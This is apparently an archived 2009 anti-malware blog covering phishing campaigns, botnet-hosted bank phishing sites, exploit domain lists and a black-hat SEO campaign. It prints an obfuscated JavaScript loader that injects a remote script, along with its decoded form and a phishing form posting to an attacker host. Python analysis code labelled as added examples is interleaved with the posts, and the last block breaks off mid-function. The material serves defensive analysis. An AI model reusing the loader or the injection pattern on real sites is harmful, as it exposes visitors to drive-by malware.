If you are receiving multiple messages of this kind, you may utilize the
"Blocked Addresses" feature of Yahoo! Mail in this instance. This
feature consists of a list of addresses that cannot send mail to your
account. Incoming mail from these addresses will be automatically
disposed of, without bouncing back to the sender. When you remove an
address from your Blocked Addresses list, you will once again be able to
receive mail from that address.

You can have up to 100 addresses on the Blocked Addresses list. To
manually add an address to the list of blocked addresses, simply follow
these steps:

1. Click "Mail Options", on the top right-hand navigation bar of your
Yahoo! Mail page.

2. Click "Block Addresses".

3. The list of addresses you are currently blocking will be displayed in
the Blocked Addresses window.

4. Enter the new address in the "Enter email address to block" field,
then click "Add Block".

5. That's it! The address will be added to your Blocked Addresses list,
and you will no longer receive messages from that address.

In addition, please visit the following website for useful tools to
combat spam:

http://antispam.yahoo.com/

If we can be of further assistance, please let us know.

Your patience during this process is greatly appreciated.

Thank you again for contacting Yahoo! Mail.

Regards,

Addley

Yahoo! Customer Care

62714199

For assistance with all Yahoo! services please visit:

http://help.yahoo.com/


Oh hell no - they didn't just reply to me with the same damn thing as last time did they? Yeppers - they did.

So I'd like to offer Yahoo some advice;

1. STOP using automated responses
2. STOP using form letters
3. READ THE DAMN REPORTS!!!!

Had they done #3, there would've been no need for #1 or #2.

References:

XFiles HMRC Phishing Campaign
http://hphosts.blogspot.com/2009/07/xfiles-hmrc-phishing-campaign.html

Friday, 24 July 2009

2 out of band Microsoft security updates

Microsoft Security Bulletin Advance Notification issued: July 24, 2009
Microsoft Security Bulletins to be issued: July 28, 2009


This is an advance notification of two out-of-band security bulletins that Microsoft is intending to release on July 28, 2009. One bulletin will be for the Microsoft Visual Studio product line; application developers should be aware of updates available affecting certain types of applications. The second bulletin contains defense-in-depth changes to Internet Explorer to address attack vectors related to the Visual Studio bulletin, as well as fixes for unrelated vulnerabilities that are rated Critical. Customers who are up to date on their security updates are protected from known attacks related to this out-of-band release.

This bulletin advance notification will be replaced with an update to the Microsoft Security Bulletin Summary for July 2009 on July 28, 2009. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification.


Read more
http://www.microsoft.com/technet/security/Bulletin/ms09-jul-ans.mspx

Part 2: Who is exploiting the Adobe Flash 0day

The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, this vulnerability can just as easily be exploited in a standard drive-by fashion purely in Flash as well. This is precisely what has started to happen.

Here is the snippet of the javascript which is actively targeting this 0-day vulnerability.

This exploit successfully worked on my VM under Firefox 3.5.1 and Flash player 10. It worked smoothly and just before FireFox crashed, I saw an outbound communication like this:

GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive


Read more
http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html

XFiles HMRC Phishing Campaign

No, not the Mulder and Scully XFiles, this is the xfilees.biz domain, hosted at Yahoo's AltaVista netblock.

Our dear phisher has made two mistakes here, however. Firstly, the .htm page attached to the e-mail, as you can see in the screenshot, is not presented properly (they forgot to set a base href to the HMRC domain, so it doesn't display properly). Secondly, HMRC NEVER sends out attachments such as this. And finally, they didn't bother checking who they were trying to phish, so I got a copy (woops!).

A quick look at the .htm's source code, instantly gives away who is responsible for this particular scam (and don't worry, I've notified HMRC, your hosting company, and of course the authorities);

<form name="logonForm" onsubmit="if (Validate()==false) return false;" action="http://www.xfilees.biz/luk.php" method="post">
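That one form tag is the whole giveaway: a "logon" form inside a detached .htm attachment posting to a host that has nothing to do with HMRC. The Python below is an added example (not part of the original post) that pulls every form action and its input fields out of an HTML attachment and flags forms that collect credential or card fields but post somewhere other than an expected brand host. The HTML fragment is constructed around the quoted form tag, and the HMRC host allow-list is an assumption.

```python
"""Flag credential forms in an HTML attachment that post off-brand.

Added example, not from the original post. EXPECTED_HOSTS is an assumed
allow-list of where a genuine HMRC form would post; SAMPLE is a constructed
fragment built around the form tag quoted on the page.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

EXPECTED_HOSTS = {"hmrc.gov.uk"}   # assumption for this example
CREDENTIAL_FIELDS = {"password", "passwd", "card", "cvv", "pin", "account"}


class FormCollector(HTMLParser):
    """Collect each <form> action plus the (name, type) of inputs inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                       # attribute values may be None
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                ((a.get("name") or "").lower(), (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_matches(host: str, allowed: set) -> bool:
    """True if host is an allowed domain or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in allowed)


def asks_for_credentials(inputs: list) -> bool:
    """Any password-type input, or a name hinting at a secret/card field."""
    return any(t == "password" or any(k in n for k in CREDENTIAL_FIELDS)
               for n, t in inputs)


def suspicious_forms(html: str, allowed: set = EXPECTED_HOSTS) -> list:
    """Return (action, reason) for each form that looks like credential theft."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        action = form["action"]
        host = (urlsplit(action).hostname or "").lower()
        collects = asks_for_credentials(form["inputs"])
        if not host and collects:
            # A relative action in a detached attachment resolves to wherever
            # the file was opened from, never to the brand's site.
            findings.append((action, "relative action in a detached attachment"))
        elif host and not host_matches(host, allowed):
            reason = f"posts to {host}, not an expected HMRC host"
            if collects:
                reason += " (collects credential/card fields)"
            findings.append((action, reason))
    return findings


# Constructed sample reproducing the form tag quoted on the page
SAMPLE = """
<form name="logonForm" onsubmit="if (Validate()==false) return false;"
      action="http://www.xfilees.biz/luk.php" method="post">
  <input name="userid" type="text">
  <input name="password" type="password">
  <input name="cardnumber" type="text">
</form>
"""

if __name__ == "__main__":
    for action, reason in suspicious_forms(SAMPLE):
        print(f"{action}: {reason}")
```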


The domain WhoIs shows little;

Domain Name: XFILEES.BIZ
Domain ID: D32902433-BIZ
Sponsoring Registrar: MELBOURNE IT LTD
Sponsoring Registrar IANA ID: 13
Domain Status: clientTransferProhibited
Registrant ID: B124834080000021
Registrant Name: Yuliya Trofimovic
Registrant Organization: Private Registration US
Registrant Address1: PO Box 61359
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 94088
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.5105952002
Registrant Email: contact@myprivateregistration.com
Administrative Contact ID: B124834080000017
Administrative Contact Name: PrivateRegContact Admin
Administrative Contact Organization: Private Reg US
Administrative Contact Address1: PO Box 61359
Administrative Contact City: Sunnyvale
Administrative Contact State/Province: CA
Administrative Contact Postal Code: 94088
Administrative Contact Country: United States
Administrative Contact Country Code: US
Administrative Contact Phone Number: +1.5105952002
Administrative Contact Email: contact@myprivateregistration.com
Billing Contact ID: D124834010635579
Billing Contact Name: PrivateRegContact Bill
Billing Contact Organization: Private Reg US
Billing Contact Address1: PO Box 61359
Billing Contact City: Sunnyvale
Billing Contact State/Province: CA
Billing Contact Postal Code: 94088
Billing Contact Country: United States
Billing Contact Country Code: US
Billing Contact Phone Number: +1.5105952002
Billing Contact Email: contact@myprivateregistration.com
Technical Contact ID: B124834080000019
Technical Contact Name: PrivateRegContact TECH
Technical Contact Organization: Private Reg US
Technical Contact Address1: PO Box 61359
Technical Contact City: Sunnyvale
Technical Contact State/Province: CA
Technical Contact Postal Code: 94088
Technical Contact Country: United States
Technical Contact Country Code: US
Technical Contact Phone Number: +1.5105952002
Technical Contact Email: contact@myprivateregistration.com
Name Server: YNS1.YAHOO.COM
Name Server: YNS2.YAHOO.COM
Created by Registrar: MELBOURNE IT LTD
Last Updated by Registrar: MELBOURNE IT LTD
Domain Registration Date: Thu Jul 23 09:20:49 GMT 2009
Domain Expiration Date: Thu Jul 22 23:59:59 GMT 2010
Domain Last Updated Date: Thu Jul 23 09:20:55 GMT 2009


Notice the registration date? Yep, it was just created yesterday (aww and you gots blacklisted already?).

Little tip for you guys, by the way: the IP block this one is hosted on is also known for malware and exploits, so you may as well just blackhole it.

http://hosts-file.net/?s=216.39.57.104&view=matches

Thursday, 23 July 2009

DirectI: An update ....

I've received a response from Aman at DirectI concerning the domains we (as in, those of us in the sec com, not just me ;o)) found;

Dear Steven,

All domain names listed on the given posts, registered under registrar Public Domain Registry, are now suspended. Domains listed on http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx were taken down yesterday. Upon investigating further, we found a few more domain names registered in a similar manner, which are also now on hold. The registration pattern seems to be non-conventional and somehow these perpetrators managed to sneak in and register these domain names with different identities. We are still investigating these trends to beef up our internal tools to detect such registrations. For now, these customer accounts are frozen.

Most of these registrations were done during an ongoing promotional offer on .IN domain names. There are quite a few domain names in the list that are registered with Sponsoring Registrar: Visesh Infotecnics Ltd. (R42-AFIN) who might also be running this promo offer. Please note that Visesh Infotecnics Ltd is an independent registrar using a management platform that we provide. We have forwarded them this list and asked them to take action according to their abuse policy.

Please be assured that our intentions and attitude towards abuse remain those of zero tolerance.

Our alert email address is precisely for sharing intelligence with us so that such issues can be nipped in the bud.

We look forward to your co-operation and understanding.

Best Regards;
Aman Masjide
DirectI Abuse Desk


I'm extremely happy to see they've not gone back to their old ways - major kudos to DirectI!

Is your computer part of the Alliance and Leicester phishing botnet?

I've been seeing these for several days now, and they seem to have a new one every day or two. Thus far, I've seen 9 different domains, all pointing to Alliance & Leicester phishing scam pages - but here's the kicker - they're ALL hosted on DRONE COMPUTERS! (in other words, the hosts have all been compromised and are now part of a botnet).

http://hosts-file.net/misc/hpObserver_-_Alliance_and_Leicester_com_phishing_Scams.html

Incidentally, there only seem to be a handful of IPs involved at present, which makes it a rather small and amateurish botnet:

138.210.155.220 - No PTR (Failed to resolve)
209.169.140.119 - 140-119.mc.royaume.com
200.204.145.250 - 200-204-145-250.speedyterra.com.br
219.83.125.242 - No PTR (Failed to resolve)
220.253.19.46 - 220-253-19-46.VIC.netspace.net.au
75.199.109.38 - 38.sub-75-199-109.myvzw.com
86.52.63.134 - 56343f86.rev.stofanet.dk
65.202.231.12 - No PTR (Failed to resolve)
203.208.84.7 - 7.84.208.203.cable.dyn.mql.ncable.com.au
74.130.145.52 - 74-130-145-52.dhcp.insightbb.com
78.106.123.116 - 78-106-123-116.broadband.corbina.ru
81.233.253.133 - 81-233-253-133-no13.tbcn.telia.com
97.90.152.194 - 97-90-152-194.static.mtpk.ca.charter.com
99.37.122.59 - adsl-99-37-122-59.dsl.chcgil.sbcglobal.net
24.8.130.146 - c-24-8-130-146.hsd1.co.comcast.net
68.54.210.173 - c-68-54-210-173.hsd1.in.comcast.net
68.61.133.232 - c-68-61-133-232.hsd1.mi.comcast.net
69.250.79.6 - c-69-250-79-6.hsd1.md.comcast.net
76.115.11.52 - c-76-115-11-52.hsd1.wa.comcast.net
98.235.109.247 - c-98-235-109-247.hsd1.pa.comcast.net
98.235.149.126 - c-98-235-149-126.hsd1.pa.comcast.net
24.164.131.147 - cpe-24-164-131-147.nyc.res.rr.com
95.96.143.37 - dhcp-095-096-143-037.chello.nl
208.107.67.19 - host-19-67-107-208.midco.net
95.235.181.233 - host233-181-dynamic.235-95-r.retail.telecomitalia.it
88.132.124.178 - host-88-132-124-178.prtelecom.hu


As you can see, by far the worst affected at present appear to be Comcast customers. I've not yet looked into which botnet is actually responsible for this, but no doubt the number of drones involved will grow over the next few days.
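The tell here is the PTR names: a hosting company's reverse DNS looks like ks361128.kimsufi.com, whereas dhcp-, adsl-, cpe- and hsd1 names spread across many ISPs and countries mean consumer broadband, i.e. compromised machines. The following is an added example, not part of this post or of hpObserver: it parses a constructed subset of the ip/PTR pairs listed above, groups them by operator and scores how residential the pool looks. The marker list and the thresholds are my own heuristics, not anything the post defines.

```python
"""Triage a phishing domain's resolution results: many IPs spread over
consumer ISPs (dynamic/DHCP/cable PTR names) point to compromised hosts
rather than a hosting company. Added example, not part of the hpHosts post;
RESOLUTION_DUMP is a constructed subset of the ip - PTR lines above."""
import re
from collections import Counter

RESOLUTION_DUMP = """\
138.210.155.220 - No PTR (Failed to resolve)
200.204.145.250 - 200-204-145-250.speedyterra.com.br
220.253.19.46 - 220-253-19-46.VIC.netspace.net.au
75.199.109.38 - 38.sub-75-199-109.myvzw.com
24.8.130.146 - c-24-8-130-146.hsd1.co.comcast.net
68.54.210.173 - c-68-54-210-173.hsd1.in.comcast.net
98.235.109.247 - c-98-235-109-247.hsd1.pa.comcast.net
24.164.131.147 - cpe-24-164-131-147.nyc.res.rr.com
95.96.143.37 - dhcp-095-096-143-037.chello.nl
99.37.122.59 - adsl-99-37-122-59.dsl.chcgil.sbcglobal.net
"""

# PTR fragments that typically mark consumer/dynamic address space (heuristic).
RESIDENTIAL_MARKERS = ("dhcp", "dyn", "dsl", "adsl", "cable", "res.", "cpe-",
                       "hsd1", "broadband", "pool")
# Suffixes under which the operator's name sits one label deeper.
TWO_LABEL_SUFFIXES = ("com.br", "com.au", "net.au", "co.uk", "or.id")

LINE_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+-\s+(.*)$")


def parse_dump(text):
    """Return [(ip, ptr_or_None)] from 'ip - ptr' lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ip, ptr = m.group(1), m.group(2).strip()
        if ptr.startswith("No PTR") or "failed" in ptr.lower():
            ptr = None
        records.append((ip, ptr))
    return records


def operator_domain(ptr):
    """Approximate the operator from a PTR: last two labels, or three under com.br etc."""
    labels = ptr.lower().rstrip(".").split(".")
    if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def looks_residential(ptr):
    p = ptr.lower()
    return any(marker in p for marker in RESIDENTIAL_MARKERS)


def triage(text):
    """Summarise the pool and give a verdict (thresholds are heuristic)."""
    records = parse_dump(text)
    by_isp = Counter(operator_domain(ptr) for _, ptr in records if ptr)
    residential = sum(1 for _, ptr in records if ptr and looks_residential(ptr))
    no_ptr = sum(1 for _, ptr in records if ptr is None)
    n = len(records)
    spread_out = n >= 5 and len(by_isp) >= 3 and residential / n >= 0.5
    verdict = "likely compromised hosts (botnet-hosted)" if spread_out else "inconclusive"
    return {"ips": n, "isps": dict(by_isp), "residential": residential,
            "no_ptr": no_ptr, "verdict": verdict}


if __name__ == "__main__":
    summary = triage(RESOLUTION_DUMP)
    for isp, count in sorted(summary["isps"].items(), key=lambda kv: -kv[1]):
        print(f"{count:3d}  {isp}")
    print(summary["verdict"])
```

For abuse reports, the per-operator counts are the useful output: each ISP gets its own list of infected customers, which is how the drones actually get cleaned up.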

As has been mentioned many many many times before;

1. DO NOT click links in e-mails. If you do not know your bank's URL, look on your last bank statement (it will be on there), then MANUALLY type it into your browser's address bar.

2. DO NOT use HTML e-mail. Using HTML e-mail not only allows them to cloak the REAL URL you will be taken to, it also provides an infection vector - it may not be as pretty, but stick with PLAIN TEXT E-MAIL.

3. YOUR BANK WILL NEVER ASK FOR THE DETAILS THESE PHISHING SCAMS ASK FOR!!! DO NOT BE FOOLED INTO HANDING IT OVER. IF IN DOUBT, CALL YOUR BANK!

It should be noted, though it should also be obvious, that Alliance and Leicester are not the only bank whose customers are being phished. I'm also seeing a slew of Halifax, Lloyds TSB, Abbey National, etc etc etc phishing scams coming into my inbox at present (and yes, I'm deliberately not filtering them out - I actually like receiving spam and phishing scams - they provide for nice little blog articles such as this).

/edit 14:09 23-07-2009

This one just came in a couple minutes ago, making the number of domains now 10;

http://hosts-file.net/?s=www.mybank.alliance-leicester950.com

IPs:

76.115.11.52 - c-76-115-11-52.hsd1.wa.comcast.net
99.37.122.59 - adsl-99-37-122-59.dsl.chcgil.sbcglobal.net
200.204.145.250 - 200-204-145-250.speedyterra.com.br
88.132.124.178 - host-88-132-124-178.prtelecom.hu
68.54.210.173 - c-68-54-210-173.hsd1.in.comcast.net
97.90.152.194 - 97-90-152-194.static.mtpk.ca.charter.com
95.96.143.37 - dhcp-095-096-143-037.chello.nl
24.8.130.146 - c-24-8-130-146.hsd1.co.comcast.net
68.61.133.232 - c-68-61-133-232.hsd1.mi.comcast.net
74.210.187.149 - 74-210-187-149.hy.cgocable.ca

/edit 15:58 23-07-2009

www.mybank.alliance-leicester184.com

95.235.181.233 - host233-181-dynamic.235-95-r.retail.telecomitalia.it
74.75.104.93 - cpe-74-75-104-93.maine.res.rr.com
69.250.79.6 - c-69-250-79-6.hsd1.md.comcast.net
95.96.143.37 - dhcp-095-096-143-037.chello.nl
200.204.145.250 - 200-204-145-250.speedyterra.com.br
202.77.97.227 - mail.ykkbi.or.id
209.169.140.119 - 140-119.mc.royaume.com
219.83.125.242 - Resolution failed
63.26.180.234 - 1Cust5354.an4.chi30.da.uu.net
65.202.231.12 - Resolution failed

DirectI: A return to old form?

UPDATE: http://hphosts.blogspot.com/2009/07/directi-update.html

Have DirectI returned to old form again, or is this just a coincidence?

http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

The screenshot above left shows a domain used in an exploit campaign, registered via DirectI. Then of course there's this lot (all exploit domains, so DO NOT LOAD IN A BROWSER!), all of which resolve to:

IP: 78.47.25.168
PTR: static.168.25.47.78.clients.your-server.de
Desc: FastVPS Ltd, St Petersburg, Russia

bigtopstats.cn
gqil.in
gzpf.in
lzwn.in
q0a.in
q0c.in
q0i.in
q0j.in
q0k.in
q0l.in
q0u.in
q0v.in
q0w.in
q0x.in
q1b.in
q1d.in
q1e.in
q1f.in
q1l.in
q1m.in
q1u.in
q1v.in
q1w.in
q3b.in
q3c.in
q3n.in
q3o.in
q3s.in
q5a.in
q5c.in
q5k.in
q5l.in
q5m.in
q5u.in
q5v.in
q5x.in
thehomename.cn
u0c.in
u0e.in
u0s.in
u0t.in
u1a.in
u1b.in
u1l.in
u1m.in
u1w.in
u1x.in
u1y.in
u3h.in
u3j.in
u3m.in
u3v.in
u3y.in
u4w.in
u5c.in
u5d.in
u5e.in
u5k.in
u5l.in
u5m.in
u5t.in
u5v.in
u5w.in
u6c.in
u6d.in
u6l.in
u6n.in
u6v.in
u6x.in
u7e.in
u7f.in
u7g.in
u7o.in
u7p.in
u7z.in
u8b.in
u8i.in
u8j.in
u8t.in
u8v.in
u9b.in
u9c.in
u9i.in
u9j.in
u9k.in
www.q0a.in
www.q0c.in
www.q0i.in
www.q0j.in
www.q0k.in
www.q0l.in
www.q0u.in
www.q0v.in
www.q0w.in
www.q0x.in
www.q1b.in
www.q1d.in
www.q1e.in
www.q1f.in
www.q1k.in
www.q1l.in
www.q1m.in
www.q1n.in
www.q1u.in
www.q1v.in
www.q1w.in
www.q3b.in
www.q3c.in
www.q3e.in
www.q3n.in
www.q3o.in
www.q3s.in
www.q5a.in
www.q5c.in
www.q5k.in
www.q5l.in
www.q5m.in
www.q5u.in
www.q5v.in
www.q5x.in
www.thehomename.cn
www.u0c.in
www.u0e.in
www.u0t.in
www.u1a.in
www.u1b.in
www.u1j.in
www.u1l.in
www.u1m.in
www.u1w.in
www.u1x.in
www.u1y.in
www.u3h.in
www.u3j.in
www.u3m.in
www.u3v.in
www.u3y.in
www.u4w.in
www.u5c.in
www.u5d.in
www.u5e.in
www.u5k.in
www.u5l.in
www.u5m.in
www.u5t.in
www.u5v.in
www.u5w.in
www.u6c.in
www.u6d.in
www.u6l.in
www.u6n.in
www.u6v.in
www.u6x.in
www.u7e.in
www.u7f.in
www.u7g.in
www.u7o.in
www.u7p.in
www.u7z.in
www.u8b.in
www.u8i.in
www.u8j.in
www.u8t.in
www.u8v.in
www.u9b.in
www.u9c.in
www.u9i.in
www.u9j.in
www.u9k.in
www.x0b.in
www.x0c.in
www.x0q.in
www.x0v.in
www.x1h.in
www.x1i.in
www.x1v.in
www.x3a.in
www.x3b.in
www.x3y.in
www.x5o.in
www.x6h.in
www.x6i.in
www.x6q.in
www.x6r.in
www.x7b.in
www.x7c.in
www.x7d.in
www.x7k.in
www.x7l.in
www.x7o.in
www.x8c.in
www.x8e.in
www.x8f.in
www.x8m.in
www.x8n.in
www.x8o.in
www.x8u.in
www.x8v.in
www.x8w.in
www.x8y.in
www.x9d.in
www.x9e.in
www.x9f.in
www.x9g.in
www.x9m.in
www.x9n.in
www.x9o.in
www.x9p.in
www.x9u.in
www.x9v.in
www.x9w.in
www.x9y.in
x0b.in
x0c.in
x0q.in
x0v.in
x1h.in
x1i.in
x3a.in
x3b.in
x3y.in
x5o.in
x6h.in
x6i.in
x6q.in
x6r.in
x7c.in
x7d.in
x7l.in
x7o.in
x8c.in
x8e.in
x8f.in
x8m.in
x8n.in
x8o.in
x8v.in
x8w.in
x8y.in
x9d.ru
x9e.in
x9f.in
x9g.in
x9m.in
x9n.in
x9n.ru
x9o.in
x9p.in
x9v.in
x9w.in
x9y.in


inetnum: 78.47.25.128 - 78.47.25.191
netname: FASTVPS-LTD
descr: FastVPS Ltd
country: DE
admin-c: OL203-RIPE
tech-c: OL203-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE # Filtered

person: Oleg Lyubimov
address: Leninskiy pr. 96-1-128
address: 198332 Saint-Petersburg
address: RUSSIAN FEDERATION
phone: +79219707212
fax-no: +79219707212
e-mail: oleg.lyubimov@gmail.com
nic-hdl: OL203-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered

:: Information related to '78.46.0.0/15AS24940'

route: 78.46.0.0/15
descr: HETZNER-RZ-NBG-BLK5
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered

organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
Attn. Martin Hetzner
Stuttgarter Str. 1
91710 Gunzenhausen
GERMANY
phone: +49 9831 610061
fax-no: +49 9831 610062
e-mail: info@hetzner.de
admin-c: GM834-RIPE
admin-c: HOAC1-RIPE
admin-c: MH375-RIPE
admin-c: RB1502-RIPE
admin-c: SK2374-RIPE
admin-c: DM93-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered


But we're not done yet. We're also seeing these resolve to additional IPs:

79.170.89.217 - netvibe.xlshosting.net
80.93.90.88 - 8442hd90088.ikexpress.com
91.121.167.41 - ks361128.kimsufi.com
91.121.174.19 - vidpic3.com
213.251.176.169 - ks35069.kimsufi.com

These contain yet more malicious domains, some also registered via DirectI, such as the one in the screenshot at the top of this post!

Wonder what their excuse for this will be? (already fired off an e-mail as I'm dying to see them try and worm their way out of this one - surely they knew we'd be monitoring them?).

References:

MalwareURL - 78.47.25.168
http://www.malwareurl.com/search.php?domain=&s=78.47.25.168&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 79.170.89.217
http://www.malwareurl.com/search.php?domain=&s=79.170.89.217&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 80.93.90.88
http://www.malwareurl.com/search.php?domain=&s=80.93.90.88&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 91.121.
http://www.malwareurl.com/search.php?domain=&s=91.121&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 213.251.176.169
http://www.malwareurl.com/search.php?domain=&s=213.251.176.169&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

Update re digitalspy.co.uk
http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

Russian Business Network Updates
http://temerc.com/forums/viewtopic.php?f=4&t=3888

ALERT: please be extremely cautious when visiting digitalspy.co.uk
http://msmvps.com/blogs/spywaresucks/archive/2009/07/20/1703278.aspx

DirectI and HostFresh still supporting criminals!
http://hphosts.blogspot.com/2008/10/directi-and-hostfresh-still-supporting.html

Wednesday, 22 July 2009

BlackHat SEO campaigns change tactics

Over the past few weeks, I've noticed a couple of interesting changes in the tactics used by those responsible for the BlackHat SEO campaigns. First and foremost, let's track back a second to June, which documented one of the campaigns.

The campaign documented in June referenced a few characteristics that could be used to identify these pages and rip them out of the index. So what's changed? Well, first and foremost, the .htm files have been changed to .php files;



Second, 2.js is now only included in the file if the HTTP_REFERER server variable is a Google search URL, for example;

http://vurl.mysteryfcm.co.uk/?url=740536

There are a few obvious reasons for this, the first being to prevent direct analysis. However, since the referer can be faked, there's nothing they can do to prevent us finding this. Additionally, the .js file can be accessed directly, so this doesn't really help them either.

There's also a new campaign however, that uses similar characteristics. I say similar because;

1. There's the obligatory .js file (in this case Bsrajp.js) that's only included if the referer points to Google
2. The .js file doesn't use the same method as before to obfuscate the code
3. We can no longer just load the URL the decoded script gives us, as it now requires that the SEOREF (which should point to Google) and HTTP_REFERER (which points back to the site that loaded our .js file) vars be properly populated and point to the correct referers.

The new obfuscation is extremely poor;

Oukaoy=document; Fbhm='rrer'; var Qtoheo="U";
var Iqza=new Array();
Qtoheo+='RL'; Fbhm='refe'+Fbhm;
Iqza[12]="8";
Iqza[7]="atist";
Iqza[19]="&defau"+"lt_ke"+"yword=sex";
Iqza[5]="ttp://qu";
Iqza[13]="&seoref="+encodeURIComponent(Oukaoy[Fbhm]);
Iqza[17]="P_REFE";
Iqza[21]="scr";
Iqza[14]="&param";
Iqza[20]="\"></";
Iqza[15]="eter=$ke";
Iqza[4]="h";
Iqza[8]="ic.com/in.";
Iqza[1]="scri";
Iqza[9]="cgi?";
Iqza[16]="yword&se=$se&ur=1&HTT";
Iqza[18]="RER="+encodeURIComponent(Oukaoy[Qtoheo]);
Iqza[10]="8&gro";
Iqza[2]="pt src";
Iqza[22]="ipt>";
Iqza[6]="ickst";
Iqza[0]="<";
Iqza[3]="=\"";
Iqza[11]="up=n16040";
for (var Xjko=0;Xjko<Iqza.length;Xjko++)
document.write(Iqza[Xjko]);


Which decodes to;

<script src="http://quickstatistic.com/in.cgi?8&group=n160408&seoref=http%3A%2F%2Fwww.google.co.uk%2Fsearch%3Fhl%3Den%26q%3D%2522ppguid.txt.html%2522%26meta%3D&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwilliamrerea82.tripod.com%2F&default_keyword=sex"></script>
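The obfuscation is nothing more than a shuffled array of string fragments written out in index order, with two runtime lookups (document.referrer and document.URL) spliced in, so it can be decoded without ever running the script. The following is an added example, not code from this post: it re-parses the loader quoted above with a small statement walker, substitutes constructed values for the two DOM reads (the referer has to look like a Google search for the next stage to answer, as noted earlier), and pulls the tracking parameters back out of the resulting script tag. The tiny JS subset it understands (string literals, `+`, variables, `encodeURIComponent(alias[alias])`) is exactly what this sample uses and nothing more.

```python
"""Static decode of the 'array of fragments + document.write' loader quoted
above. Added example, not from the hpHosts post; FAKE_DOM holds constructed
stand-ins for document.referrer / document.URL."""
import re
from urllib.parse import quote, urlparse, parse_qs

# The loader from the post (statements regrouped onto fewer lines; same code).
OBFUSCATED = r'''
Oukaoy=document; Fbhm='rrer'; var Qtoheo="U";
var Iqza=new Array();
Qtoheo+='RL'; Fbhm='refe'+Fbhm;
Iqza[12]="8"; Iqza[7]="atist"; Iqza[19]="&defau"+"lt_ke"+"yword=sex";
Iqza[5]="ttp://qu"; Iqza[13]="&seoref="+encodeURIComponent(Oukaoy[Fbhm]);
Iqza[17]="P_REFE"; Iqza[21]="scr"; Iqza[14]="&param"; Iqza[20]="\"></";
Iqza[15]="eter=$ke"; Iqza[4]="h"; Iqza[8]="ic.com/in."; Iqza[1]="scri";
Iqza[9]="cgi?"; Iqza[16]="yword&se=$se&ur=1&HTT";
Iqza[18]="RER="+encodeURIComponent(Oukaoy[Qtoheo]);
Iqza[10]="8&gro"; Iqza[2]="pt src"; Iqza[22]="ipt>"; Iqza[6]="ickst";
Iqza[0]="<"; Iqza[3]="=\""; Iqza[11]="up=n16040";
for (var Xjko=0;Xjko<Iqza.length;Xjko++)
document.write(Iqza[Xjko]);
'''

# Constructed values for the two DOM properties the loader reads at runtime.
FAKE_DOM = {
    "referrer": "http://www.google.co.uk/search?hl=en&q=%22ppguid.txt.html%22&meta=",
    "URL": "http://williamrerea82.tripod.com/",
}

STMT_RE = re.compile(r"(?:var\s+)?(\w+)(?:\[(\d+)\])?\s*(\+?=)\s*([^;]+);")
ENCODE_RE = re.compile(r"encodeURIComponent\((\w+)\[(\w+)\]\)")


def split_concat(expr):
    """Split a JS expression on '+' operators that sit outside string literals."""
    parts, buf, quote_ch, i = [], "", None, 0
    while i < len(expr):
        c = expr[i]
        if quote_ch:                      # inside a literal: copy, honour escapes
            buf += c
            if c == "\\" and i + 1 < len(expr):
                buf += expr[i + 1]
                i += 1
            elif c == quote_ch:
                quote_ch = None
        elif c in "'\"":
            quote_ch, buf = c, buf + c
        elif c == "+":
            parts.append(buf.strip())
            buf = ""
        else:
            buf += c
        i += 1
    parts.append(buf.strip())
    return parts


def js_unescape(literal):
    return re.sub(r"\\(.)", r"\1", literal[1:-1])


def evaluate(expr, variables):
    """Evaluate the concatenation subset this loader uses; raise on anything else."""
    out = []
    for tok in split_concat(expr):
        if tok[:1] in ("'", '"'):
            out.append(js_unescape(tok))
        elif tok == "document":
            out.append("document")         # sentinel: the alias names the DOM
        elif tok in variables:
            out.append(variables[tok])
        else:
            m = ENCODE_RE.fullmatch(tok)
            if not m or variables.get(m.group(1)) != "document":
                raise ValueError(f"unhandled token: {tok}")
            # encodeURIComponent leaves - _ . ! ~ * ' ( ) unencoded
            out.append(quote(FAKE_DOM[variables[m.group(2)]], safe="!*'()"))
    return "".join(out)


def decode(script):
    """Replay the string assignments and emit what document.write would produce."""
    variables, arrays = {}, {}
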